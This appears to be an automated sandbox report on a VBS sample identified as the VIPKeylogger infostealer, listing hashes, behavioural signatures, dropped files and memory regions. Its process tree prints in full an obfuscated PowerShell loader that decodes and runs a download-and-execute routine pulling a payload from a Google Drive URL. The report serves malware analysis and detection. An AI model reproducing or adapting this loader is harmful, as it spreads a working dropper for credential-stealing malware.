Analysis

  • max time kernel
    119s
  • max time network
    120s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64, arch:x86, image:win7-20240903-en, locale:en-us, os:windows7-x64, system
  • submitted
    23-10-2024 01:36

General

  • Target

    982fc9bb4315f9e7114479b0a684873cbdc9e99ed75d96a342fd46235f59e84e.vbs

  • Size

    525KB

  • MD5

    2358bb1bd8cf609df9f1917cf4224194

  • SHA1

    45e0ca20b16c048979d95b59f40475f8fa282e32

  • SHA256

    982fc9bb4315f9e7114479b0a684873cbdc9e99ed75d96a342fd46235f59e84e

  • SHA512

    c2c0e324c07f027edb5e6c34ce368b7d3387fddf6078e5e17c80efa9211381ff58dc27acc22511d0d9f0775b08a43eabfbd7a00061d9f6a3689d3c07a23e9230

  • SSDEEP

    6144:By/7hX57oFbgZQmRmM0rdGqqgLpjDLkB8Gj+xJ9HQ5/vyGVi4dAMuUnhbeDLttD6:kyRgiYgqSjDoB4x7w5XLduIeD53Vgzeg

Malware Config

Extracted

Family

vipkeylogger

Credentials

Signatures

  • VIPKeylogger

    VIPKeylogger is a keylogger and infostealer written in C#; it resembles SnakeKeylogger, which was first found in 2020.

  • Blocklisted process makes network request 10 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Uses the powershell.exe command.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

    Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.

  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 11 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\982fc9bb4315f9e7114479b0a684873cbdc9e99ed75d96a342fd46235f59e84e.vbs"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2896
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Projectiles Aabenlys Retshandlen Consularity #>;$acetatsilke='Uladsiggrliges';<#Indsbningers Sebaceous allometric Regalvanise Ndvendiggrer Lgkupledes #>;$Tmmerhandlers173=$Ministeren+$host.UI; function Tmema($granaterne){If ($Tmmerhandlers173) {$Overgesticulatively++;}$Skalperingen=$Tubaist+$granaterne.'Length'-$Overgesticulatively; for( $Udbringningen=5;$Udbringningen -lt $Skalperingen;$Udbringningen+=6){$Udbringningennequalness=$Udbringningen;$Formiddagstime+=$granaterne[$Udbringningen];$Unaltered='Community';}$Formiddagstime;}function Eftertragtelsen($Hopperne){ & ($Geeing) ($Hopperne);}$Priscianist=Tmema 'NormaMDoe ioTeslazTrickiBlufflPinitlOdontaCulic/Forri ';$Priscianist+=Tmema 'Alunh5Pol t.Fryse0Autar Sind,(,dmntWLimonisol angringd Su poK ranwNedsasPensi KnyttN AmorTne,fo Knuff1Insol0Bulb,.Masth0Plade; skar SlubbWEm ryiVildtn berg6Space4Nonap;Flint OverbxKrige6 Hell4 Ured;topa. NonlirTryklvUdbom:Takti1S.igb3Fi,th1 rra. Anod0Gnath) Synk EjendGSvvefeHulefcOxbowkSyereoPeori/Billy2Fi,mo0Kvase1 Bran0haver0Capta1Adjek0Andaq1Bleak WolseF overiFlorurAg ateD,skrf CemeoFructxLucro/ Cor 1 ard3Nonde1Remem. yom0 Sola ';$Skematiserer=Tmema 'triozUmi reSFiberEFlu tR R ve- uggiA Res,GSeancE Fo pNAl edTDvehj ';$Diskettefejlenes=Tmema ' Pickh ThoftRedivtPatr pTriflsFiske:Clear/ djo/ DefedTrn ar abreiSubplvB.tnaeVan s.Mar igbasseo UnwroMe amgBlythlPhotoeN.npr. 
Struc DestoDiscemFi et/ProabuFaldecLevul?BetaledaakaxForgepHulkiol.parrSo,iatSekle= sprdd BrndoGangrw lvinnLandil Mi.poKonvoaF,tned,ries&.otaliSche dSkiag=Par,l1RmninGSkurrcPlentrAutodPSamsspDolicsT rzeOslada9ProsuFCatalj Angu6Kurer3Tj ekA StkyjMisdeZ Beath M.dtJWichto recuJSmu.vfNondebVanreJ SougW mlasH TvinY StacTAfbrkq rmmeWAvitaAOpmunG OceawAnretVPeror ';$Datauheldenes=Tmema 'Priv >Fav t ';$Geeing=Tmema ' Cavai LepteAn ekx V ge ';$Fabriker='Rifted';$Studenterhavrens='\Realiaernes60.Svo';Eftertragtelsen (Tmema 'Misas$UnderGConcilTaranoaftalbUnforaBibl l Afst:RakkeMOverbY lmioSkovstSkeggiRou,eCE eri=Fintl$ omuletyndsNHjernv.xcer: ByggAEkskrP Uperp Dec,DStngeASuzanTPiffla Kupp+Sn,bn$Be raS adavTAkantU,aglsdBarnde .onmNSjlerTDatase SclaRTaphvherektaforhavBook.RKolosEKoinen AnkeSUnflo ');Eftertragtelsen (Tmema 'M rke$VitriGOplstl ElemoP almbb rkeA Udm.LSolen:SidetGNoegeoUdstrDUrbanh ClavJMis rePulmoRMassiT BlodevaporDLandseDy ehsAntia=,bsol$Repr.d NvneiLogjasUeg nKDem.re Filtt Abbet Esthe P.ysfP acte Sti JDublel E uiE .estNStngeeSpgelSEvang.Tillus ollpFdepulH,ghbiBetontTweyf(Dipl $HabildIn omAStorttFll,saRabb u LivshPotp.eForf lNutatD Ta ke SejrNDisbaeN,edesRekla) Staa ');Eftertragtelsen (Tmema 'Mauve[BartrNTelegEH,eretBap i.,agnasTaleneScreeRPar ivBellbiMag ecOpht,EPostrPunthaONettoiFa atNDecolT UnliMFilipadimerNfl atAIckergSgsmaEFar drFl we] U,or:Incep:opslaSCre mEQuotiCSekonuTri sRFraraIMbelftPreopyHje.tppr anR SutlOBass t MelooSopr cstj.ro IndhlParap Ur.lo=Para Sacri[SkefunFron.EDevittBl.wb.IncarSAnmareU infc H eruTeglvR KimsiCurioTFeri y LigePSilesrBilleOC efptSiddeOTipolCvolaiO HerrLHamultDubleYLevanp ExpreTular]Resis: re r:Str pTTestilJavahSepenc1 fore2T get ');$Diskettefejlenes=$Godhjertedes[0];$Besigtigelses=(Tmema 'Rygek$PotteGare dLArgumoSelenBPatriATekstlHenvi:ratlaN yliooInterNsta gmjamaieUrgamdRundiiFlettcIrresIHalvaN etaa DybfLStour=U lannM scuEOpdrtW Car - astoKortsBSo leJOmsorER cirCbogreTSte,p DioptsHyracYSaddeSBarratJo,stE Bo tmMfind.forbrNolaioe 
UndeTBu ts.W rwowParaseAfkbeBApomiCDalarLTh.opiFiskeEsube NSideftSnurr ');Eftertragtelsen ($Besigtigelses);Eftertragtelsen (Tmema 'Euka $Inde,NLannioPreven ntikmHoldue DeridBisatiLysgtc Li ciAlpernOlieraRehuml Meje.SemiaHFlommeDruk.aUbevgdSopraeanfrer .versKanar[Lu,pe$ aturSOpsgnkCalcaeH.adrmSp staMileatBoofhiChiffsKombie bl,erKrnkee SkygrRepor]Sukke=Skatt$GapleP irkrp essiMythosPaasecSkadeiSvumma EngknEncumiCladmsSpl,ntSubsi ');$Kodogu=Tmema 'Doupi$UndesNJawbaoGat inStvsumFerrue .hoedBrugei c,incMahani St rn Handathin lKatte.arracDS.nktoBenytwTelevnTilsml Unlaopunt a ForhdF eelFsphini KravlFor eeRrels(Bitre$BryggDFifteiPaasks entok Milje,utoftY rdetFedere Sponf,tenhe K,ndjTar ilCanaseShipbnObnoxe nachsmales,Femog$BesugW Uop.oReob oDiag l AkuppDipnea Torbc L gkkCremesAfbre)Konju ';$Woolpacks=$Myotic;Eftertragtelsen (Tmema 'ordre$Ioti gTarsiLDundeoDubbeB G unA xoplBorg,:S porG TuniRIsoleaDrivkNBovisD TffeAKompodTorcuDMoorbYKldni1kolle3Contr0 Cell= Golg(OratoTCatakeEnsidsOutstT.choe-Ph,liP DbefaAcantt.orreH Ek p Maeg $ JolawForvrO Fe.lo ortLSkja PKarinAMislyc KattkadelasMetan) Unac ');while (!$Grandaddy130) {Eftertragtelsen (Tmema 'l.ngm$ElegigFstnil Logio MacebNiella Destl Rhip:JovicFBarwaoCountrKorrim.verfy jemfnArmordN.tabeImitar FamisPropek.nderamothebTaia eZombir GrinnOverae Lsep=Ndven$Sta dtInharrUnconuWatereSster ') ;Eftertragtelsen $Kodogu;Eftertragtelsen (Tmema 'Pi.fisEksilTMus,uaDe rar Tea.TRefor-AllicSPolypl FyrseLandeEC.nospBac a indus4dir c ');Eftertragtelsen (Tmema 'Ombyg$ ftnigPerveL acuOPa ceBApol,aTrykslCovin:TransGGrundRP eceADoormNAmts DFuldsA BrandBronzdBefrayNo.co1Soste3 Kvaj0Camou=Odon ( FlsktWatchECalanSSamfutValor-Forpap Bi tASnderTBerggHAngor Catna$ IraqWInstaoR,saloRubelLGran P BeteA .estCBrendkLi,kesYppig)Lowli ') ;Eftertragtelsen (Tmema 'Ovali$Tr quGDoucel StadOAntimBKwapaaFlyveLAndri:SkridP F,onRteks iplumaS LaplN .ejliCryptVconveESubl.ANedraU C ewSVasel=D spe$EksklGUramiln.utrOBrunebVriknA ovpLPensi: KonjMCrooka pe oK 
Stv.rUnnasOFalliKFreeba GeneLTitindletfreR loknparchenglep+Indka+,rapp%Asyls$Cornig ,popoAntepDcatheHTidsfJ JaghEK ociR b,svT V ideReva D VadeeForbesLeuc..Trak.CFler oRingkUKarbunWing tShac ') ;$Diskettefejlenes=$Godhjertedes[$Prisniveaus];}$whiterider=322484;$Vaaset=30962;Eftertragtelsen (Tmema 'Sol v$SkabeG eriel ReciOXanthbUdkobaSl mhLRaas : OverN foruo F.rdNSpunspAfs.aoKronipYoureuUnponLPlakaAD illRDiseml SkriyInkom2 Mink3tab l7Qinta R son= ,jem Efterg Unree Dipht .rne-Dom,ncAntedo ingvnEluvitLy,ose iggnRiveoTTrans Thin$Sd,rbwShirtOKunstOBuballKhmerp Rv,raPycnoc LidekRes rsdepic ');Eftertragtelsen (Tmema 'Di.et$CuratgAttrilJoltlounadeb UhygaAdvislGains:.radmTUnralrNovatlAsphegKlarlgSjkkeeu,hamnCountdVesiceCasca Postu= Mini B evb[ RethS BasiyF.rbrsE phyt ReakeFlimmmStori.skudsCAkvaro S monArco.v OffieCrater Ufort feue] roff:Sort :VeranF MaltrAggrao jninm S asBUni,aaNominsSttere R dd6Supel4ch moS dyretNitrorBeskyiUncurnB,vgegspray( Ingb$antiaNImpreoOlam,nForsepWilysoKodakpHeim uB nsklUnvila Preirpanetlf.emtyUdrad2Nedno3Decim7B.sep)Savbl ');Eftertragtelsen (Tmema ' Stvn$OestrGUgeblLWringODommebPetreaStri,LRende:KnstnsTil iKSaag aFabrilDekupOCentrtHellitGrounEM grn Y.gl= Trum Brim[ KrhgsLeksiyOmsorS RemiTKorriEbnkevMBacte.BermmTJurisE sselx ImagTpheno.CaecieForelNM.skmC S ddoAllw dComm ISt mpN Tu bgQu nd] Scru:Haddo:Brne aaeronsWa,blcTackbIFrergicardi. Drmmg pdate yskat irgs Moo.tQuadrR NondI ShelNBenedg.igyn(Dehyd$Hug ltEquivrCretilOptagGM,rdeGClocke SubfnSejr DKogleeTrykk)bi ol ');Eftertragtelsen (Tmema 'Cribb$Nerveg steL Palao ForeBM croaAchr,lKonto: SomatWhinseSandwMObeliaTe uiDHol,eAAutopGStamheMo phN,lbowe PumisFrems= Zoof$ RumbsSyph KPreasADe.mol Aktios lvatsekt T.onmueMemor.Ek pesForivu mbreBPropeSOrgietKonk.RSmrfeIRaffuNRetteGPures( Domm$ TillwForurhBr acIBaandTPol leder aR ProgiNo.medMacroeMiliarPsych,Leges$f ickvKetasAUn,haaLizbesC imaeSnohaTCa ag)Lrred ');Eftertragtelsen $Temadagenes;"
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2252
  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Projectiles Aabenlys Retshandlen Consularity #>;$acetatsilke='Uladsiggrliges';<#Indsbningers Sebaceous allometric Regalvanise Ndvendiggrer Lgkupledes #>;$Tmmerhandlers173=$Ministeren+$host.UI; function Tmema($granaterne){If ($Tmmerhandlers173) {$Overgesticulatively++;}$Skalperingen=$Tubaist+$granaterne.'Length'-$Overgesticulatively; for( $Udbringningen=5;$Udbringningen -lt $Skalperingen;$Udbringningen+=6){$Udbringningennequalness=$Udbringningen;$Formiddagstime+=$granaterne[$Udbringningen];$Unaltered='Community';}$Formiddagstime;}function Eftertragtelsen($Hopperne){ & ($Geeing) ($Hopperne);}$Priscianist=Tmema 'NormaMDoe ioTeslazTrickiBlufflPinitlOdontaCulic/Forri ';$Priscianist+=Tmema 'Alunh5Pol t.Fryse0Autar Sind,(,dmntWLimonisol angringd Su poK ranwNedsasPensi KnyttN AmorTne,fo Knuff1Insol0Bulb,.Masth0Plade; skar SlubbWEm ryiVildtn berg6Space4Nonap;Flint OverbxKrige6 Hell4 Ured;topa. NonlirTryklvUdbom:Takti1S.igb3Fi,th1 rra. Anod0Gnath) Synk EjendGSvvefeHulefcOxbowkSyereoPeori/Billy2Fi,mo0Kvase1 Bran0haver0Capta1Adjek0Andaq1Bleak WolseF overiFlorurAg ateD,skrf CemeoFructxLucro/ Cor 1 ard3Nonde1Remem. yom0 Sola ';$Skematiserer=Tmema 'triozUmi reSFiberEFlu tR R ve- uggiA Res,GSeancE Fo pNAl edTDvehj ';$Diskettefejlenes=Tmema ' Pickh ThoftRedivtPatr pTriflsFiske:Clear/ djo/ DefedTrn ar abreiSubplvB.tnaeVan s.Mar igbasseo UnwroMe amgBlythlPhotoeN.npr. 
Struc DestoDiscemFi et/ProabuFaldecLevul?BetaledaakaxForgepHulkiol.parrSo,iatSekle= sprdd BrndoGangrw lvinnLandil Mi.poKonvoaF,tned,ries&.otaliSche dSkiag=Par,l1RmninGSkurrcPlentrAutodPSamsspDolicsT rzeOslada9ProsuFCatalj Angu6Kurer3Tj ekA StkyjMisdeZ Beath M.dtJWichto recuJSmu.vfNondebVanreJ SougW mlasH TvinY StacTAfbrkq rmmeWAvitaAOpmunG OceawAnretVPeror ';$Datauheldenes=Tmema 'Priv >Fav t ';$Geeing=Tmema ' Cavai LepteAn ekx V ge ';$Fabriker='Rifted';$Studenterhavrens='\Realiaernes60.Svo';Eftertragtelsen (Tmema 'Misas$UnderGConcilTaranoaftalbUnforaBibl l Afst:RakkeMOverbY lmioSkovstSkeggiRou,eCE eri=Fintl$ omuletyndsNHjernv.xcer: ByggAEkskrP Uperp Dec,DStngeASuzanTPiffla Kupp+Sn,bn$Be raS adavTAkantU,aglsdBarnde .onmNSjlerTDatase SclaRTaphvherektaforhavBook.RKolosEKoinen AnkeSUnflo ');Eftertragtelsen (Tmema 'M rke$VitriGOplstl ElemoP almbb rkeA Udm.LSolen:SidetGNoegeoUdstrDUrbanh ClavJMis rePulmoRMassiT BlodevaporDLandseDy ehsAntia=,bsol$Repr.d NvneiLogjasUeg nKDem.re Filtt Abbet Esthe P.ysfP acte Sti JDublel E uiE .estNStngeeSpgelSEvang.Tillus ollpFdepulH,ghbiBetontTweyf(Dipl $HabildIn omAStorttFll,saRabb u LivshPotp.eForf lNutatD Ta ke SejrNDisbaeN,edesRekla) Staa ');Eftertragtelsen (Tmema 'Mauve[BartrNTelegEH,eretBap i.,agnasTaleneScreeRPar ivBellbiMag ecOpht,EPostrPunthaONettoiFa atNDecolT UnliMFilipadimerNfl atAIckergSgsmaEFar drFl we] U,or:Incep:opslaSCre mEQuotiCSekonuTri sRFraraIMbelftPreopyHje.tppr anR SutlOBass t MelooSopr cstj.ro IndhlParap Ur.lo=Para Sacri[SkefunFron.EDevittBl.wb.IncarSAnmareU infc H eruTeglvR KimsiCurioTFeri y LigePSilesrBilleOC efptSiddeOTipolCvolaiO HerrLHamultDubleYLevanp ExpreTular]Resis: re r:Str pTTestilJavahSepenc1 fore2T get ');$Diskettefejlenes=$Godhjertedes[0];$Besigtigelses=(Tmema 'Rygek$PotteGare dLArgumoSelenBPatriATekstlHenvi:ratlaN yliooInterNsta gmjamaieUrgamdRundiiFlettcIrresIHalvaN etaa DybfLStour=U lannM scuEOpdrtW Car - astoKortsBSo leJOmsorER cirCbogreTSte,p DioptsHyracYSaddeSBarratJo,stE Bo tmMfind.forbrNolaioe 
UndeTBu ts.W rwowParaseAfkbeBApomiCDalarLTh.opiFiskeEsube NSideftSnurr ');Eftertragtelsen ($Besigtigelses);Eftertragtelsen (Tmema 'Euka $Inde,NLannioPreven ntikmHoldue DeridBisatiLysgtc Li ciAlpernOlieraRehuml Meje.SemiaHFlommeDruk.aUbevgdSopraeanfrer .versKanar[Lu,pe$ aturSOpsgnkCalcaeH.adrmSp staMileatBoofhiChiffsKombie bl,erKrnkee SkygrRepor]Sukke=Skatt$GapleP irkrp essiMythosPaasecSkadeiSvumma EngknEncumiCladmsSpl,ntSubsi ');$Kodogu=Tmema 'Doupi$UndesNJawbaoGat inStvsumFerrue .hoedBrugei c,incMahani St rn Handathin lKatte.arracDS.nktoBenytwTelevnTilsml Unlaopunt a ForhdF eelFsphini KravlFor eeRrels(Bitre$BryggDFifteiPaasks entok Milje,utoftY rdetFedere Sponf,tenhe K,ndjTar ilCanaseShipbnObnoxe nachsmales,Femog$BesugW Uop.oReob oDiag l AkuppDipnea Torbc L gkkCremesAfbre)Konju ';$Woolpacks=$Myotic;Eftertragtelsen (Tmema 'ordre$Ioti gTarsiLDundeoDubbeB G unA xoplBorg,:S porG TuniRIsoleaDrivkNBovisD TffeAKompodTorcuDMoorbYKldni1kolle3Contr0 Cell= Golg(OratoTCatakeEnsidsOutstT.choe-Ph,liP DbefaAcantt.orreH Ek p Maeg $ JolawForvrO Fe.lo ortLSkja PKarinAMislyc KattkadelasMetan) Unac ');while (!$Grandaddy130) {Eftertragtelsen (Tmema 'l.ngm$ElegigFstnil Logio MacebNiella Destl Rhip:JovicFBarwaoCountrKorrim.verfy jemfnArmordN.tabeImitar FamisPropek.nderamothebTaia eZombir GrinnOverae Lsep=Ndven$Sta dtInharrUnconuWatereSster ') ;Eftertragtelsen $Kodogu;Eftertragtelsen (Tmema 'Pi.fisEksilTMus,uaDe rar Tea.TRefor-AllicSPolypl FyrseLandeEC.nospBac a indus4dir c ');Eftertragtelsen (Tmema 'Ombyg$ ftnigPerveL acuOPa ceBApol,aTrykslCovin:TransGGrundRP eceADoormNAmts DFuldsA BrandBronzdBefrayNo.co1Soste3 Kvaj0Camou=Odon ( FlsktWatchECalanSSamfutValor-Forpap Bi tASnderTBerggHAngor Catna$ IraqWInstaoR,saloRubelLGran P BeteA .estCBrendkLi,kesYppig)Lowli ') ;Eftertragtelsen (Tmema 'Ovali$Tr quGDoucel StadOAntimBKwapaaFlyveLAndri:SkridP F,onRteks iplumaS LaplN .ejliCryptVconveESubl.ANedraU C ewSVasel=D spe$EksklGUramiln.utrOBrunebVriknA ovpLPensi: KonjMCrooka pe oK 
Stv.rUnnasOFalliKFreeba GeneLTitindletfreR loknparchenglep+Indka+,rapp%Asyls$Cornig ,popoAntepDcatheHTidsfJ JaghEK ociR b,svT V ideReva D VadeeForbesLeuc..Trak.CFler oRingkUKarbunWing tShac ') ;$Diskettefejlenes=$Godhjertedes[$Prisniveaus];}$whiterider=322484;$Vaaset=30962;Eftertragtelsen (Tmema 'Sol v$SkabeG eriel ReciOXanthbUdkobaSl mhLRaas : OverN foruo F.rdNSpunspAfs.aoKronipYoureuUnponLPlakaAD illRDiseml SkriyInkom2 Mink3tab l7Qinta R son= ,jem Efterg Unree Dipht .rne-Dom,ncAntedo ingvnEluvitLy,ose iggnRiveoTTrans Thin$Sd,rbwShirtOKunstOBuballKhmerp Rv,raPycnoc LidekRes rsdepic ');Eftertragtelsen (Tmema 'Di.et$CuratgAttrilJoltlounadeb UhygaAdvislGains:.radmTUnralrNovatlAsphegKlarlgSjkkeeu,hamnCountdVesiceCasca Postu= Mini B evb[ RethS BasiyF.rbrsE phyt ReakeFlimmmStori.skudsCAkvaro S monArco.v OffieCrater Ufort feue] roff:Sort :VeranF MaltrAggrao jninm S asBUni,aaNominsSttere R dd6Supel4ch moS dyretNitrorBeskyiUncurnB,vgegspray( Ingb$antiaNImpreoOlam,nForsepWilysoKodakpHeim uB nsklUnvila Preirpanetlf.emtyUdrad2Nedno3Decim7B.sep)Savbl ');Eftertragtelsen (Tmema ' Stvn$OestrGUgeblLWringODommebPetreaStri,LRende:KnstnsTil iKSaag aFabrilDekupOCentrtHellitGrounEM grn Y.gl= Trum Brim[ KrhgsLeksiyOmsorS RemiTKorriEbnkevMBacte.BermmTJurisE sselx ImagTpheno.CaecieForelNM.skmC S ddoAllw dComm ISt mpN Tu bgQu nd] Scru:Haddo:Brne aaeronsWa,blcTackbIFrergicardi. Drmmg pdate yskat irgs Moo.tQuadrR NondI ShelNBenedg.igyn(Dehyd$Hug ltEquivrCretilOptagGM,rdeGClocke SubfnSejr DKogleeTrykk)bi ol ');Eftertragtelsen (Tmema 'Cribb$Nerveg steL Palao ForeBM croaAchr,lKonto: SomatWhinseSandwMObeliaTe uiDHol,eAAutopGStamheMo phN,lbowe PumisFrems= Zoof$ RumbsSyph KPreasADe.mol Aktios lvatsekt T.onmueMemor.Ek pesForivu mbreBPropeSOrgietKonk.RSmrfeIRaffuNRetteGPures( Domm$ TillwForurhBr acIBaandTPol leder aR ProgiNo.medMacroeMiliarPsych,Leges$f ickvKetasAUn,haaLizbesC imaeSnohaTCa ag)Lrred ');Eftertragtelsen $Temadagenes;"
    1⤵
    • Command and Scripting Interpreter: PowerShell
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: MapViewOfSection
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2676
    • C:\Windows\SysWOW64\msiexec.exe
      "C:\Windows\SysWOW64\msiexec.exe"
      2⤵
      • Blocklisted process makes network request
      • Suspicious use of NtCreateThreadExHideFromDebugger
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2580

Network

MITRE ATT&CK Enterprise v15

Downloads

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\36M3RUEQT8LLWY5O32G8.temp

    Filesize

    7KB

    MD5

    567d7aab5e225a281dfd8c1dec434407

    SHA1

    83f12e7560f7f5ddcacc6753f73d4b2ea305e07d

    SHA256

    be2e610b00c6c1c55749037747e8b9af781f125a935eaacbe65d6309eb2ff868

    SHA512

    8368aeb277561b68e77e54f6c009187b95f1ba26d3edb9b7e801c198c63a27f0eb304e8b8b19bf6d3d07c04c2efda588655a6f5138b0178c6f045bf547de3b81

  • C:\Users\Admin\AppData\Roaming\Realiaernes60.Svo

    Filesize

    460KB

    MD5

    15d4bf8d1435c92eafc43ebdff22b873

    SHA1

    18a5e9c68c654584e41ddda35c8c1a7e8ea2e13a

    SHA256

    ecc8d18d98910379300d492a98f573e56ca9daafd3b1cd52ddffd44c175832ce

    SHA512

    463ca3c56eacd94dd062c048e630a14d7d89da4b16e589126357f92c32c0d42abdc0d53f59fa62ecebcee7703687b5cf75fe8a9e0dd8629745a5f6134015e41c

  • memory/2252-8-0x000007FEF55D0000-0x000007FEF5F6D000-memory.dmp

    Filesize

    9.6MB

  • memory/2252-14-0x000007FEF588E000-0x000007FEF588F000-memory.dmp

    Filesize

    4KB

  • memory/2252-4-0x000007FEF588E000-0x000007FEF588F000-memory.dmp

    Filesize

    4KB

  • memory/2252-9-0x000007FEF55D0000-0x000007FEF5F6D000-memory.dmp

    Filesize

    9.6MB

  • memory/2252-10-0x000007FEF55D0000-0x000007FEF5F6D000-memory.dmp

    Filesize

    9.6MB

  • memory/2252-11-0x000007FEF55D0000-0x000007FEF5F6D000-memory.dmp

    Filesize

    9.6MB

  • memory/2252-13-0x000007FEF55D0000-0x000007FEF5F6D000-memory.dmp

    Filesize

    9.6MB

  • memory/2252-7-0x000007FEF55D0000-0x000007FEF5F6D000-memory.dmp

    Filesize

    9.6MB

  • memory/2252-16-0x000007FEF55D0000-0x000007FEF5F6D000-memory.dmp

    Filesize

    9.6MB

  • memory/2252-6-0x00000000022A0000-0x00000000022A8000-memory.dmp

    Filesize

    32KB

  • memory/2252-5-0x000000001B650000-0x000000001B932000-memory.dmp

    Filesize

    2.9MB

  • memory/2580-21-0x0000000000170000-0x00000000011D2000-memory.dmp

    Filesize

    16.4MB

  • memory/2580-42-0x0000000000170000-0x00000000001B8000-memory.dmp

    Filesize

    288KB

  • memory/2580-41-0x0000000000170000-0x00000000011D2000-memory.dmp

    Filesize

    16.4MB

  • memory/2676-20-0x0000000006860000-0x000000000C028000-memory.dmp

    Filesize

    87.8MB